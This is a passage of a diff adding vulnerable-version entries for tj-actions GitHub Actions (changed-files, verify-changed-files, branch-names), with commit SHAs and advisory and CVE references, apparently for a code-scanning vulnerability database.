"v34.6.1", "3b6c057cd82d1dafab565df2ba9fa489574a03b8", "41"] + - ["tj-actions/changed-files", "v34.6.0", "4f64429e8be26fe81a594635b07ed829581ea847", "41"] + - ["tj-actions/changed-files", "v34.5.4", "3f1e44af6ca48144748dfc62a7a6fb22e4ca67f3", "41"] + - ["tj-actions/changed-files", "v34.5.3", "74dc2e8a7877b725678a2195226bd470f10c481b", "41"] + - ["tj-actions/changed-files", "v34.5.2", "8356a01788b5a36aa0319e74183f3237e020feac", "41"] + - ["tj-actions/changed-files", "v34.5.1", "baaf598b46c2d9eb97eb995c9f69d1967349155d", "41"] + - ["tj-actions/changed-files", "v34.5.0", "8a4cc4fbd67975557b6d85dd302f5f9400b9c92e", "41"] + - ["tj-actions/changed-files", "v34.4.4", "8a7336fb6f6bc00da867b745d3491de42ac0231b", "41"] + - ["tj-actions/changed-files", "v34.4.3", "3996bc3fded83a011dbfc57f379fd31266770b3a", "41"] + - ["tj-actions/changed-files", "v34.4.2", "ef0a29048c50f844e30fac9fef80956f9765aab8", "41"] + - ["tj-actions/changed-files", "v34.4.1", "3ebdc42d8ba53fedc5bef0f16181249ac58446fa", "41"] + - ["tj-actions/changed-files", "v34.4.0", "94e6fba8d802f0fa80db51937e8752e9c165ee26", "41"] + - ["tj-actions/changed-files", "v34.3.4", "3dbb79f46716e706df6be563a268df44b264b545", "41"] + - ["tj-actions/changed-files", "v34.3.3", "991e8b3aae0ebbe0614b15b05d14ccb92affa24a", "41"] + - ["tj-actions/changed-files", "v34.3.2", "72d3bb8b336df0723f5c9e9d5875c61bf7bdfe9f", "41"] + - ["tj-actions/changed-files", "v34.3.1", "72d3bb8b336df0723f5c9e9d5875c61bf7bdfe9f", "41"] + - ["tj-actions/changed-files", "v34.3.0", "5f89dc7d6eefdcb7323e773671fd3461a7c2f050", "41"] + - ["tj-actions/changed-files", "v34.2.2", "734bb168e38279dfc7aa2af5d5be3a1475427a99", "41"] + - ["tj-actions/changed-files", "v34.2.1", "d2e030b6ed85ce2db7ac1a4afc574640df8bca26", "41"] + - ["tj-actions/changed-files", "v34.2.0", "6ba3c59bc6825f1ad375d92a9e70c6b275db0ddd", "41"] + - ["tj-actions/changed-files", "v34.1.1", "d0e44775cd5572bb0ead1d7d2e399015644f7359", "41"] + - ["tj-actions/changed-files", "v34.1.0", "b91acef304123e58fd6671ab267d6b5e2a7f2ef3", "41"] + - ["tj-actions/changed-files", "v34.0.5", "12633630aba2ab48ec2ad8a3344dd736d61a7b89", "41"] + - ["tj-actions/changed-files", "v34.0.4", "71840771e95943b1ab0c8f8ae45aeb0a34458e2e", "41"] + - ["tj-actions/changed-files", "v34.0.3", "cbfb0fda5afcfbf4ef0ef854bf0d8210abd0866f", "41"] + - ["tj-actions/changed-files", "v34.0.2", "932dad31974f07bd23cab5870d45c6e5ad5c8b73", "41"] + - ["tj-actions/changed-files", "v34.0.1", "9f289689bb8364780830da00b69507b88b5a2f07", "41"] + - ["tj-actions/changed-files", "v34.0.0", "c4d29bf5b2769a725bcc9a723c498ba9c34c05b4", "41"] + - ["tj-actions/changed-files", "v34", "ce4b8e3cba2220de8132ac9721ff754efd6bb7d7", "41"] + - ["tj-actions/changed-files", "v33.0.0", "aa52cfcd81f1a00a6bf1241a8cad6adec4d80638", "41"] + - ["tj-actions/changed-files", "v33", "aa52cfcd81f1a00a6bf1241a8cad6adec4d80638", "41"] + - ["tj-actions/changed-files", "v32.1.2", "1d6e210c970d01a876fbc6155212d068e79ca584", "41"] + - ["tj-actions/changed-files", "v32.1.1", "8953e851a137075e59e84b5c15fbeb3617e82f15", "41"] + - ["tj-actions/changed-files", "v32.1.0", "8de562e9316b23c4473ad852e5fd4f7f2bac7bc8", "41"] + - ["tj-actions/changed-files", "v32.0.1", "7c640bd299646362775f9d02e156bc741f67453b", "41"] + - ["tj-actions/changed-files", "v32.0.0", "270645280afddc7e2cf3f4867089522c8f2f8f9a", "41"] + - ["tj-actions/changed-files", "v32", "1d6e210c970d01a876fbc6155212d068e79ca584", "41"] + - ["tj-actions/changed-files", "v31.0.3", "dd7c81416dd9ddc14c594f751cd92c661e13daee", "41"] + - ["tj-actions/changed-files", "v31.0.2", "528984a4f814905ea80ed2a3818afc97aef8b0de", "41"] + - ["tj-actions/changed-files", "v31.0.1", "75af1a47c484c669beec6a1d00fc9d1d78179725", "41"] + - ["tj-actions/changed-files", "v31.0.0", "5184a750a66da08aba414ca223aef75c055956a5", "41"] + - ["tj-actions/changed-files", "v31", "dd7c81416dd9ddc14c594f751cd92c661e13daee", "41"] + - ["tj-actions/changed-files", "v30.0.0", "402f3827f0f759df60b674e7f52a02d6f4a5af8b", "41"] + - ["tj-actions/changed-files", "v30", "402f3827f0f759df60b674e7f52a02d6f4a5af8b", "41"] + - ["tj-actions/changed-files", "v29.0.9", "f7a56405a89ea095c6230f10e7f1c49daab13b35", "41"] + - ["tj-actions/changed-files", "v29.0.8", "df4dacaa89cace34cd60d5e9580f041a041e5233", "41"] + - ["tj-actions/changed-files", "v29.0.7", "602081b5d9327a7770b4c447a4ee8984ae44e72e", "41"] + - ["tj-actions/changed-files", "v29.0.6", "6e12407521ea9b0d11a4b7ab09b40266bd39496a", "41"] + - ["tj-actions/changed-files", "v29.0.5", "c5c9b6ff9e75d84d8b69cbf82bcfbf61672ef91e", "41"] + - ["tj-actions/changed-files", "v29.0.4", "c41b7152594c4423f3787d26662239eb0ae027c0", "41"] + - ["tj-actions/changed-files", "v29.0.3", "60f4aabced9b4718c75acef86d42ffb631c4403a", "41"] + - ["tj-actions/changed-files", "v29.0.2", "82edb42dc4e3a5d5edf24cc3ae4b1f55c20cc220", "41"] + - ["tj-actions/changed-files", "v29.0.1", "18edda74753bbb7090ea030c1f80ef9610ebdff1", "41"] + - ["tj-actions/changed-files", "v29.0.0", "bec82ebb3493119ba317fcee8a0d1db09d39d1ac", "41"] + - ["tj-actions/changed-files", "v29", "f7a56405a89ea095c6230f10e7f1c49daab13b35", "41"] + - ["tj-actions/changed-files", "v28.0.0", "28ac6724247a133793509b5d165d58319b40a171", "41"] + - ["tj-actions/changed-files", "v28", "602cf940579b9a2b2db0aafe835bfdb675fac12c", "41"] + - ["tj-actions/changed-files", "v27", "5e56dcabdd4a97ea745791856930038be56d9b70", "41"] + - ["tj-actions/changed-files", "v26.1", "58ae566dc69a926834e4798bcfe0436ff97c0599", "41"] + - ["tj-actions/changed-files", "v26", "7394701157dae4adb4eaa75d8c99e9b2edff81fe", "41"] + - ["tj-actions/changed-files", "v25", "36e65a11651994e93d6f1ef3afa781c3dcbb9780", "41"] + - ["tj-actions/changed-files", "v24.1", "bf6ddb7db66f9da5b2cffeb28b2b696aacb26e1c", "41"] + - ["tj-actions/changed-files", "v24", "6c44eb8294bb9c93d6118427f4ff8404b695e1d7", "41"] + - ["tj-actions/changed-files", "v23.2", "b2ee165d6b42ab1740e1037eb93748aad96767c5", "41"] + - ["tj-actions/changed-files", "v23.1", "34a865a2b221bd60ec0d4c071f5e7a66ffdac88a", "41"] + - ["tj-actions/changed-files", "v23", "fb1fe28aa9ff24afc553b37545437005a4cf2115", "41"] + - ["tj-actions/changed-files", "v22.2", "ae90a0b602c90d598c0c027a519493c1a069543e", "41"] + - ["tj-actions/changed-files", "v22.1", "bc1dc8f54db8eeeaae00ab92737ab34926b9ad8d", "41"] + - ["tj-actions/changed-files", "v22", "3de1f9a283b61f308ee3045be4d301037657225a", "41"] + - ["tj-actions/changed-files", "v21", "0edfedf16d9ff0903cbe599d474a022823ca8fb8", "41"] + - ["tj-actions/changed-files", "v20.2", "205450238e81d3da0e0ec2d776f58c12846fddfb", "41"] + - ["tj-actions/changed-files", "v20.1", "944a8b89098b24b0723ed9264888eb7fcffbbe9a", "41"] + - ["tj-actions/changed-files", "v20", "581eef0495dd5b75a3dd93047ff9f0d42dc09370", "41"] + - ["tj-actions/changed-files", "v19.3", "e55f7fb99e90111108bc24d3f14156b06ab6a12c", "41"] + - ["tj-actions/changed-files", "v19.2", "07b38ce1a17c46f1d0eb1150c8a33f703d473262", "41"] + - ["tj-actions/changed-files", "v19.1", "d26252004aa87df12f72411feec056907ecdbadc", "41"] + - ["tj-actions/changed-files", "v19", "a6d456f542692915c5289ea834fb89bc07c11208", "41"] + - ["tj-actions/changed-files", "v18.7", "a59f800cbb60ed483623848e31be67659a2940f8", "41"] + - ["tj-actions/changed-files", "v18.6", "a2f1692a6f703b7a14e155ae404e6bb15538b763", "41"] + - ["tj-actions/changed-files", "v18.5", "72aab29255d4fd553ccf1c0fa3223dcc62a2fd84", "41"] + - ["tj-actions/changed-files", "v18.4", "e35d0afdc1f0b01f84ec0f4cdf1b179325634b36", "41"] + - ["tj-actions/changed-files", "v18.3", "081ee9cc54a7ded6c421c632f23a31dbbe34a5f3", "41"] + - ["tj-actions/changed-files", "v18.2", "1f30bd2085b83668fb636f1a1f90744d8adbacca", "41"] + - ["tj-actions/changed-files", "v18.1", "227e314ad84036340cab47e649d91b012275a53c", "41"] + - ["tj-actions/changed-files", "v18", "ffd30e8dd820b89653c2298acf0447d29dbd0f16", "41"] + - ["tj-actions/changed-files", "v17.3", "f5a8de7d36c5909d300d7fcc8d6340d2a56ab9d9", "41"] + - ["tj-actions/changed-files", "v17.2", "0bc7d4006fb085334217ec5d6e6c288daade2f59", "41"] + - ["tj-actions/changed-files", "v17.1", "a53d74f700f2982646d538e66ce35cbfc8d4e826", "41"] + - ["tj-actions/changed-files", "v17", "933541631c41bad3fe20bdbd440ec68afa9a9518", "41"] + - ["tj-actions/changed-files", "v16", "4daffbaee17b34b8ae544990906277485819cc16", "41"] + - ["tj-actions/changed-files", "v15.1", "4b1f26aed507a21569666773e1c753dfe409d806", "41"] + - ["tj-actions/changed-files", "v15", "09441d38eaf8b76cbe2c42e256f46dfb432f63a4", "41"] + - ["tj-actions/changed-files", "v14.7", "e44053b6a0e8e7df1aa50a171c46601c605f61bb", "41"] + - ["tj-actions/changed-files", "v14.6", "c0dba8199070f01fcea9cd3a4dc42b365f06bf8d", "41"] + - ["tj-actions/changed-files", "v14.5", "fd2e9917c337ba7e2222d5aa9e32b27a57a71d14", "41"] + - ["tj-actions/changed-files", "v14.4", "2a8a501ad614cd775a2c07537b555783496dc085", "41"] + - ["tj-actions/changed-files", "v14.3", "a8ea7202c1c248d93235e87cc59e5b3a9881f558", "41"] + - ["tj-actions/changed-files", "v14.2", "88edda5361ed308226d6cb938eaa8b18182750f5", "41"] + - ["tj-actions/changed-files", "v14.1", "be68c10267c4979ed30c9397041b052b2980f91f", "41"] + - ["tj-actions/changed-files", "v14", "b59431bc7d44f9e8951a290fc7d48879f2ca1939", "41"] + - ["tj-actions/changed-files", "v13.2", "68bd279d40fb5bfc976429283b060c6ee426f63c", "41"] + - ["tj-actions/changed-files", "v13.1", "2c85495a7bb72f2734cb5181e29b2ee5e08e61f7", "41"] + - ["tj-actions/changed-files", "v13", "f276697f3b86a1d897052524507c59f5e173ccd1", "41"] + - ["tj-actions/changed-files", "v12.2", "00f80efd45353091691a96565de08f4f50c685f8", "41"] + - ["tj-actions/changed-files", "v12.1", "f56e736bedd192c12951db94e83a440885d04eb1", "41"] + - ["tj-actions/changed-files", "v12", "019a09d36e5b592a6770a9a71ef1b3efd9a85d37", "41"] + - ["tj-actions/changed-files", "v11.9", "3b638a970886ec84db14ad956bb4df9766bd7c50", "41"] + - ["tj-actions/changed-files", "v11.8", "b42f932be5b3fee4a990cb3e03478d5da2d4293b", "41"] + - ["tj-actions/changed-files", "v11.7", "8dfe0ee3f4840f84a7947b5288b19d7a583755ae", "41"] + - ["tj-actions/changed-files", "v11.6", "aae164d51be780a235cdeea89752bbacbbfee3c3", "41"] + - ["tj-actions/changed-files", "v11.5", "09a879748c548705ec26508c030b11aad9b5097a", "41"] + - ["tj-actions/changed-files", "v11.4", "b54a7ae7259d0729d0b582bac28b05462f16cd64", "41"] + - ["tj-actions/changed-files", "v11.3", "902e60737927ccef3713faad3752d84f1153d7ac", "41"] + - ["tj-actions/changed-files", "v11.2", "2b51570d5f086eb07a1e527a182773b2045ec26b", "41"] + - ["tj-actions/changed-files", "v11.1", "040111b36775c1033b4703b77f9c5c203da18936", "41"] + - ["tj-actions/changed-files", "v11", "3b638a970886ec84db14ad956bb4df9766bd7c50", "41"] + - ["tj-actions/changed-files", "v10.1", "1d34e69895b85e643b9b259d54f395f0d1e27c10", "41"] + - ["tj-actions/changed-files", "v10", "b86b537e2b78397b630cfb1a8d0aec1e03379737", "41"] + - ["tj-actions/changed-files", "v9.3", "2a771ad30d623c27165b3677688ebe3f17c49f65", "41"] + - ["tj-actions/changed-files", "v9.2", "75933dc40b241db3752ed4c9e2f24cb7cfff51f9", "41"] + - ["tj-actions/changed-files", "v9.1", "2c0d12b627191145ce31c2a098d8d37e93b35861", "41"] + - ["tj-actions/changed-files", "v9", "7abdbc94e90b9a9b002ad86d8d2a5f9472c3c75c", "41"] + - ["tj-actions/changed-files", "v8.9", "675ab58887b9ae58d77d4dcd2d5e58228ab5f185", "41"] + - ["tj-actions/changed-files", "v8.8", "8c6f276ea5961fa51474aaa203c6d06226acbaa8", "41"] + - ["tj-actions/changed-files", "v8.7", "d825b1f7094e756ca34581aaab611003eaa23975", "41"] + - ["tj-actions/changed-files", "v8.6", "0bd70b7aecded5f2eb1f0498c3692433f2453b37", "41"] + - ["tj-actions/changed-files", "v8.5", "0fe67a1f15b48dcd40e7ea0dfdd4afc9418febf0", "41"] + - ["tj-actions/changed-files", "v8.4", "7bfa539f0d6ed4331d2899e7440a1946929829c1", "41"] + - ["tj-actions/changed-files", "v8.3", "d679de9200b28e963362cba99095dd8d9f23d446", "41"] + - ["tj-actions/changed-files", "v8.2", "1e10ed49507767257514a643ca1baab24a5496af", "41"] + - ["tj-actions/changed-files", "v8.1", "0754fdabe31b721683e1ffc719584df67ad24c87", "41"] + - ["tj-actions/changed-files", "v8", "d290bdd91e68dcf1bafe3fa63280666077cbc61c", "41"] + - ["tj-actions/changed-files", "v7", "15b1769fc52da64fe168a41ccb01c48b27687149", "41"] + - ["tj-actions/changed-files", "v6.3", "2ecd06deb6721d96fd1da0369fc6be39e974edba", "41"] + - ["tj-actions/changed-files", "v6.2", "5fe8e4d60450bbe483ca011b747c4a972a79ef07", "41"] + - ["tj-actions/changed-files", "v6.1", "7c66aa285d3ec22f1b8442b9a498ebb76ca5f57b", "41"] + - ["tj-actions/changed-files", "v6", "2ecd06deb6721d96fd1da0369fc6be39e974edba", "41"] + - ["tj-actions/changed-files", "v5.3", "e95bba87d2bd0b2bab4094abd9755a74f16703e6", "41"] + - ["tj-actions/changed-files", "v5.2", "7852058eeee10d857e59ce41f3cb465a70c96ae0", "41"] + - ["tj-actions/changed-files", "v5.1", "81f32e24026825ecfb7cb5d3951f91cfe788b0ad", "41"] + - ["tj-actions/changed-files", "v5.0.0", "450eadf5a0462f8d0b5e99d07d4b6d8f7358420c", "41"] + - ["tj-actions/changed-files", "v5", "0e956bb09e9b05df440a2459a041cdec3cc0cc0c", "41"] + - ["tj-actions/changed-files", "v4.4", "300e935beb285fcda513be84333e8726d5a544fb", "41"] + - ["tj-actions/changed-files", "v4.3", "fcb2ab8c32c2b66fdf94ab3deede353f8fe6f77c", "41"] + - ["tj-actions/changed-files", "v4.2", "271bbd60fedbc83dbb8cb00ce88bb4532d940e2f", "41"] + - ["tj-actions/changed-files", "v4.1", "e8ace0110cd60a2a0a729d52078ad6cec839dbb9", "41"] + - ["tj-actions/changed-files", "v4.0.7", "473984bd85c24f1fe61c0494d317cc7d490e1235", "41"] + - ["tj-actions/changed-files", "v4.0.6", "032f37fd241eeaf66ead8120552a3c6a157d1f22", "41"] + - ["tj-actions/changed-files", "v4.0.5", "3a35bdf667b36191faf1eea2b8c2cfbb8890bd25", "41"] + - ["tj-actions/changed-files", "v4.0.4", "c2216f65fdd828a28c41d6c97d242ec39ed694f3", "41"] + - ["tj-actions/changed-files", "v4.0.3", "0f16c26f3d5699a26be12446509c537ee964c1a8", "41"] + - ["tj-actions/changed-files", "v4.0.2", "271468ecafc0c12c5f0ce364317a640a5668eba7", "41"] + - ["tj-actions/changed-files", "v4.0.1", "fb063fc7d459d8ee25f9b3ed48ec83bc5c51df72", "41"] + - ["tj-actions/changed-files", "v4.0.0", "a05436ffa9505d25707f781260a99d01cebd0d13", "41"] + - ["tj-actions/changed-files", "v4", "c061ef1fa3d028267a34edff2d42a34c8d56ec53", "41"] + - ["tj-actions/changed-files", "v3.3", "489e2d514f3a230d66dbf74efec7ceed7b171703", "41"] + - ["tj-actions/changed-files", "v3.2", "8d5a33c6034b0991a3fe85b2e73012a689eadf92", "41"] + - ["tj-actions/changed-files", "v3.1", "fbfaba544e2ae235b2f88c936bcd5f8aa12419cc", "41"] + - ["tj-actions/changed-files", "v3.0.2", "1980f551b48196e1d8aa48fbfd924cedde0d3e13", "41"] + - ["tj-actions/changed-files", "v3.0.1", "a86b5608ded2e43fee87cbbde6394e0be7f46a41", "41"] + - ["tj-actions/changed-files", "v3.0.0", "f917cc3459f79321da6af2a153cb91ce82a34aaf", "41"] + - ["tj-actions/changed-files", "v3", "e18ccae8fe477263087493451ea812d4d36faa4e", "41"] + - ["tj-actions/changed-files", "v2.1", "e1d275d6d3255d6a586052675d3c5cef793edccf", "41"] + - ["tj-actions/changed-files", "v2.0.1", "00f80efd45353091691a96565de08f4f50c685f8", "41"] + - ["tj-actions/changed-files", "v2.0.0", "9c1a181e67797cd053d15062eda07b2b322bbbfe", "41"] + - ["tj-actions/changed-files", "v2", "5eaa2d80dddfe7de6f7cc75fcaeb554851737685", "41"] + - ["tj-actions/changed-files", "v1.3.1", "188487d180e816622215bd011cbaca666af41ed9", "41"] + - ["tj-actions/changed-files", "v1.3.0", "30988915fa46789ba51cc1436c92488a52ac44ee", "41"] + - ["tj-actions/changed-files", "v1.2.2", "467d26c8b77612d9f7d20df5271edc207eae69a7", "41"] + - ["tj-actions/changed-files", "v1.2.1", "d9eb683b30e5b231c948331ad364b991fa8be544", "41"] + - ["tj-actions/changed-files", "v1.2.0", "09a879748c548705ec26508c030b11aad9b5097a", "41"] + - ["tj-actions/changed-files", "v1.1.3", "8e7cc77ab9c1bffc233f2f3023d1b89ed44c9af5", "41"] + - ["tj-actions/changed-files", "v1.1.2", "81ad4b874479c31a00285815995079e20c6c2779", "41"] + - ["tj-actions/changed-files", "v1.1.1", "5e2a2f192377df7d67537b0e788e1b53e8a76f12", "41"] + - ["tj-actions/changed-files", "v1.1.0", "1af9ab38306a2fa478c9772eabab167444dbc755", "41"] + - ["tj-actions/changed-files", "v1.0.3", "55a857d66a8e01f50a2a37d18239edde79b1668d", "41"] + - ["tj-actions/changed-files", "v1.0.2", "62a9200adfe8200623dcd28ca74973e82baa954c", "41"] + - ["tj-actions/changed-files", "v1.0.1", "b915d091052b9d35e7c200d1da10cc6e2ec266e2", "41"] + - ["tj-actions/changed-files", "v1.0.0", "f0751de6af436d4e79016e2041cf6400e0833653", "41"] + - ["tj-actions/changed-files", "v1", "eef94236f6b9dec768f89dc72b9e0b64e13bb36e", "41"] + + # tj-actions/verify-changed-files + # https://github.com/advisories/GHSA-ghm2-rq8q-wrhc + # CVE-2023-52137 + - ["tj-actions/verify-changed-files", "v16.1.1", "54e20d3c522fbeed99ebaf2e38a1eb33214c58ba", "17"] + - ["tj-actions/verify-changed-files", "v16.1.0", "a9b6fd340565065ad293625200630be7fd2b0f13", "17"] + - ["tj-actions/verify-changed-files", "v16.0.1", "30aa174f53f67ecd5dc8e190dfbe46392202e5a5", "17"] + - ["tj-actions/verify-changed-files", "v16.0.0", "7f1b21ceb7ef533b97b46e89e2f882ee5cb17ae0", "17"] + - ["tj-actions/verify-changed-files", "v16", "54e20d3c522fbeed99ebaf2e38a1eb33214c58ba", "17"] + - ["tj-actions/verify-changed-files", "v15.0.2", "0409e189c445fab593a10a28e19663f0b012b5a5", "17"] + - ["tj-actions/verify-changed-files", "v15.0.1", "7da22d0521c254e711e5988bd2c7d48c2948d137", "17"] + - ["tj-actions/verify-changed-files", "v15.0.0", "7016858e130743cc6c6b472849411d40aa8ae1ce", "17"] + - ["tj-actions/verify-changed-files", "v15", "0409e189c445fab593a10a28e19663f0b012b5a5", "17"] + - ["tj-actions/verify-changed-files", "v14.0.2", "7517b838f3a0d51de4b334a61ef1330672118927", "17"] + - ["tj-actions/verify-changed-files", "v14.0.1", "bad2f5d7fc7e6812ac48d7e7207025a5a4cc93d3", "17"] + - ["tj-actions/verify-changed-files", "v14.0.0", "3b573ace62e287c3d68e24e4de2ee0c6f6280d86", "17"] + - ["tj-actions/verify-changed-files", "v14", "7517b838f3a0d51de4b334a61ef1330672118927", "17"] + - ["tj-actions/verify-changed-files", "v13.2.0", "f557547e643700f439745119efed5aac390db75d", "17"] + - ["tj-actions/verify-changed-files", "v13.1", "9ed3155b72ba709881c967f75611fc5852f773b9", "17"] + - ["tj-actions/verify-changed-files", "v13", "f557547e643700f439745119efed5aac390db75d", "17"] + - ["tj-actions/verify-changed-files", "v12.0", "a3391b5a01114c49c3a8d55181a9ff4c99bf0db7", "17"] + - ["tj-actions/verify-changed-files", "v12", "a3391b5a01114c49c3a8d55181a9ff4c99bf0db7", "17"] + - ["tj-actions/verify-changed-files", "v11.1", "1d7ee9711b0a8f675208004e66bc25d593a1a0ae", "17"] + - ["tj-actions/verify-changed-files", "v11", "c4322970b4f055ede155b95586b04562796f83b7", "17"] + - ["tj-actions/verify-changed-files", "v10.1", "6e986dfff1f61105bc496287b5bbf0776092737e", "17"] + - ["tj-actions/verify-changed-files", "v10", "fa6ea307b32e5314d4a62b1209c3c782d5b5dcc9", "17"] + - ["tj-actions/verify-changed-files", "v9.2", "6f40ee1d523d9a9223204ae06919a3b2739702dc", "17"] + - ["tj-actions/verify-changed-files", "v9.1", "1b13d2556290c5ca5a94b7d042b91f3519c17d38", "17"] + - ["tj-actions/verify-changed-files", "v9", "c09bcad97929b17bacf737670bee312af98be94f", "17"] + - ["tj-actions/verify-changed-files", "v8.8", "fda469d6b456070da68fa3fdbc07a513d858b200", "17"] + - ["tj-actions/verify-changed-files", "v8.7", "bd1e271a8d26e249e0412899d4e3d8f5a89ecd6c", "17"] + - ["tj-actions/verify-changed-files", "v8.6", "367ba21c800e2a2b1451e272d24cf0caa3e4f9e4", "17"] + - ["tj-actions/verify-changed-files", "v8.5", "9dea97ec0f35d708d32dadd9b34a6af7cc28b19f", "17"] + - ["tj-actions/verify-changed-files", "v8.4", "c154cc6a77695d4483937745499e07fee62addd3", "17"] + - ["tj-actions/verify-changed-files", "v8.3", "527ff7533afca6e5bece96bd15a998f90f54c624", "17"] + - ["tj-actions/verify-changed-files", "v8.2", "e8756d59f6d66ad7376c293832e4d6eda8ae3257", "17"] + - ["tj-actions/verify-changed-files", "v8.1", "bcb4e766c132157cda3d1e8c7ca3d68d86d6ae6b", "17"] + - ["tj-actions/verify-changed-files", "v8", "25267f57f3afa6c59f1495e52da8b08c2c586606", "17"] + - ["tj-actions/verify-changed-files", "v7.2", "ea24bfd8ba4b019cb321502a4382a7a44b6ebc01", "17"] + - ["tj-actions/verify-changed-files", "v7.1", "f2a40baded88e47fa3f8e0f614832835194f4904", "17"] + - ["tj-actions/verify-changed-files", "v7", "197e12135dd5eaedd520a27882d17c1f384cf6a0", "17"] + - ["tj-actions/verify-changed-files", "v6.2", "a8f1b11a7c4dfc6706d8c64416dda0ef85d06e77", "17"] + - ["tj-actions/verify-changed-files", "v6.1", "95c26dda77430743cb3542d24b3e739417f5a881", "17"] + - ["tj-actions/verify-changed-files", "v6", "97ba4ccf1285bdfca165bc0b0a7cb1f994dae04e", "17"] + - ["tj-actions/verify-changed-files", "v5.7", "68310bb8f2a087df9f6ab1a2cc07c1e7cfc8ea28", "17"] + - ["tj-actions/verify-changed-files", "v5.6", "720ba6a5776e8687117603acab16000c0fc8868b", "17"] + - ["tj-actions/verify-changed-files", "v5.5", "cedd7096b7f23ae0307d7d82f516d666580579b3", "17"] + - ["tj-actions/verify-changed-files", "v5.4", "d68d3d232ffbba653ab0227d4bb2001cda681d12", "17"] + - ["tj-actions/verify-changed-files", "v5.3", "2e1153b8d1546dea7cd1a9db9834daceb72af17a", "17"] + - ["tj-actions/verify-changed-files", "v5.2", "c3dd6355e363eab778c129867f91da02e3285961", "17"] + - ["tj-actions/verify-changed-files", "v5.1", "81bd1de29366c53364b43cf83c4a4ddcab53b571", "17"] + - ["tj-actions/verify-changed-files", "v5", "31a9c7487cc1096253faa121489f4dbb32ca4132", "17"] + - ["tj-actions/verify-changed-files", "v4", "e981d37638f538ab477279c9f1fb6048462fd161", "17"] + - ["tj-actions/verify-changed-files", "v3.0.4", "e7f801cef44ca52e9aa496526dcd71daf5ef8437", "17"] + - ["tj-actions/verify-changed-files", "v3.0.3", "e86d0b9d1805c4e84fc90d4bcdab7371e14173d2", "17"] + - ["tj-actions/verify-changed-files", "v3.0.2", "ad255a4b81fa69c78f5fd1bb8ac95739dd3a9580", "17"] + - ["tj-actions/verify-changed-files", "v3.0.1", "3a8aed1f8847cc121e5f08e8963755154bb9df9e", "17"] + - ["tj-actions/verify-changed-files", "v3.0.gamma", "de910b5a2cdd6814c6e41d2b7c6f678eb75d430a", "17"] + - ["tj-actions/verify-changed-files", "v3.0.g", "d31b2a1fd119abbeddd18df3d95001a141b37372", "17"] + - ["tj-actions/verify-changed-files", "v3.0.beta", "e61c6fc5323423d2f0d9f04c7d15fa52af1084b0", "17"] + - ["tj-actions/verify-changed-files", "v3.0.b", "380890dc80695b7aa8047c0f824f87234defabd7", "17"] + - ["tj-actions/verify-changed-files", "v3.0.alpha", "873cfd676aea5e2a04b3f16706bd590effb5023e", "17"] + - ["tj-actions/verify-changed-files", "v3.0.a", "b0c60c86ab292cabeb4b4dc9f34c296c314fdfbb", "17"] + - ["tj-actions/verify-changed-files", "v3", "71831832d68f9fa5b527a9d692df35e1626ddfa2", "17"] + - ["tj-actions/verify-changed-files", "v2.0a", "6555389afba06cce81bc2f57a191d54f380ece0a", "17"] + - ["tj-actions/verify-changed-files", "v2", "9828a95864031bd113695ad5c68944163008d861", "17"] + - ["tj-actions/verify-changed-files", "v1.0.1", "8150cee7a747364d6b113cf8b0f59af88453a161", "17"] + - ["tj-actions/verify-changed-files", "v1", "48ddf88305af39076d425f86f0617d6f7ff23d58", "17"] + + # tj-actions/branch-names + # https://github.com/advisories/GHSA-8v8w-v8xg-79rf + # CVE-2023-49291 + - ["tj-actions/branch-names", "v7.0.6", "ab304d8562e2f137165e1d930e6d22d431189074", "7.07"] + - ["tj-actions/branch-names", "v7.0.5", "033f2358d95522973eee35810e35a86fae4a71d8", "7.07"] + - ["tj-actions/branch-names", "v7.0.4", "f7cfbc8edeb70a87ebec52e94fa8366f5077d0bc", "7.07"] + - ["tj-actions/branch-names", "v7.0.3", "309671a59e1143038c2a50f009b6adf301f6aa71", "7.07"] + - ["tj-actions/branch-names", "v7.0.2", "636cfe47b2002897ee4d3f07792c9fdd5d7dc725", "7.07"] + - ["tj-actions/branch-names", "v7.0.1", "4e532392367d7e4fb2f494f2d50c47562660cce5", "7.07"] + - ["tj-actions/branch-names", "v7.0.0", "604fda4f4254216e3b564d60fe27d68017756558", "7.07"] + - ["tj-actions/branch-names", "v6.5", "2e5354c6733793113f416314375826df030ada23", "7.07"] + - ["tj-actions/branch-names", "v6.4", "eee8675bd61ec38bcfbfedd504d8473292ba649e", "7.07"] + - ["tj-actions/branch-names", "v6.3", "a594c1e96eab7790611fdaf5bc8f76ea55cedabd", "7.07"] + - ["tj-actions/branch-names", "v6.2", "b90df97be1c548ac9c8bd9186bfea6747153bf5e", "7.07"] + - ["tj-actions/branch-names", "v6.1", "09ab61130975078eb7cde103fe8d2ae1649a1853", "7.07"] + - ["tj-actions/branch-names", "v6", "2e5354c6733793113f416314375826df030ada23", "7.07"] + - ["tj-actions/branch-names", "v5.6", "63b65253bc9542d36a60646299bd8c9af6d9ce7e", "7.07"] + - ["tj-actions/branch-names", "v5.5", "a704b89383028b5df2a4fd0b9fac9711970f18be", "7.07"] + - ["tj-actions/branch-names", "v5.4", "b0f914ba0e7aa1e243b53df97447f71eb57da09a", "7.07"] + - ["tj-actions/branch-names", "v5.3", "e0e3be64a3f10f671bb526b715f86a8a834dce75", "7.07"] + - ["tj-actions/branch-names", "v5.2", "9cd06d955f4184031cd71fbb1717ac268ade2ee0", "7.07"] + - ["tj-actions/branch-names", "v5.1", "b99758d88d96a27ee98b444451c1602a4507d243", "7.07"] + - ["tj-actions/branch-names", "v5", "dc2e78ac9284175fdc0f2d505d8b49ef99632ea8", "7.07"] + - ["tj-actions/branch-names", "v4.9", "12c1d475292ae9bb96656e80c24172db3cd60ffb", "7.07"] + - ["tj-actions/branch-names", "v4.8", "af5c6741e639608a1c0e87eaa3c0c414d427d9e4", "7.07"] + - ["tj-actions/branch-names", "v4.7", "28a6a95bc5bcc69b16010647668f1c5c4fd0dcca", "7.07"] + - ["tj-actions/branch-names", "v4.6", "b0fc3aebc2f3fb8edfd024aea4dc8a073d10db88", "7.07"] + - ["tj-actions/branch-names", "v4.5", "a0061fbc59329b02d6c530f25b9d3fc80340a792", "7.07"] + - ["tj-actions/branch-names", "v4.4", "ce1737e426445fcb5b05a09e984b66d0b27548ba", "7.07"] + - ["tj-actions/branch-names", "v4.3", "47910e48331f8d64a4d535a35e9540c1ebf767f7", "7.07"] + - ["tj-actions/branch-names", "v4.2", "f107226331b387d31308ceb1b5767b52024508e8", "7.07"] + - ["tj-actions/branch-names", "v4.1", "98c04d51ee204c4f23daee8ee15af9e8e80e36b2", "7.07"] + - ["tj-actions/branch-names", "v4", "f107226331b387d31308ceb1b5767b52024508e8", 